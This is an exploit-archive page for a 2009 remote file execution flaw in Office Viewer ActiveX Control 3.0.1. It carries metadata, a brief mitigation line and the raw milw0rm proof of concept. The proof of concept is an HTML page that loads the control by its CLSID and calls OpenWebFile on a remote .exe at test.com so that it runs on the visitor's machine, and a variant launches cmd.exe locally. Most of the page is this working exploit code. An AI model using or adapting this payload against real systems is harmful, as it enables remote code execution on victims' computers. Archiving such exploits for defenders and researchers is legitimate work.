header-logo
Suggest Exploit
vendor:
Office Viewer ActiveX Control
by:
Houssamix
9.3
CVSS
HIGH
Remote File execution exploit
94
CWE
Product Name: Office Viewer ActiveX Control
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:anydraw:office_viewer_activex_control
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2009

Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit

This exploit uses the insecure methods 'OpenWebFile()' to execute a remote file on the victim's PC. It can also execute a local file on the victim's PC by changing the function do_it to 'function Do_it() { File = "c:windowssystem32cmd.exe"; hsmx.OpenWebFile(File); }'

Mitigation:

Ensure that the Office Viewer ActiveX Control is up to date and that all security patches are applied.
Source

Exploit-DB raw data:

=======================================================================================<br>
Author: Houssamix									   <br>
=======================================================================================<br>

 Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit		<br>
 download : http://www.anydraw.com/download/EOfficeOCX.exe <br>


 Tested on Windows XP Professional SP2 , with Internet Explorer 6	<br><br>

description : this use to insecure methods "OpenWebFile()" for execute remote file in pc victime <br>
u can also execute a local file in pc victime usign this methode "Open()" , just change the function  do_it with this : <b>
function Do_it()
 {
   File = "c:\\windows\\system32\\cmd.exe"
   hsmx.OpenWebFile(File)
 }
 <br>
=======================================================================================<br>
<HTML>
<BODY>
 <object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>

<SCRIPT>

function Do_it()
 {
   File = "http://test.com/file.exe"
   hsmx.OpenWebFile(File)
 }


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>

# milw0rm.com [2009-01-13]

Navigation

Suggest Exploit

Services By CQR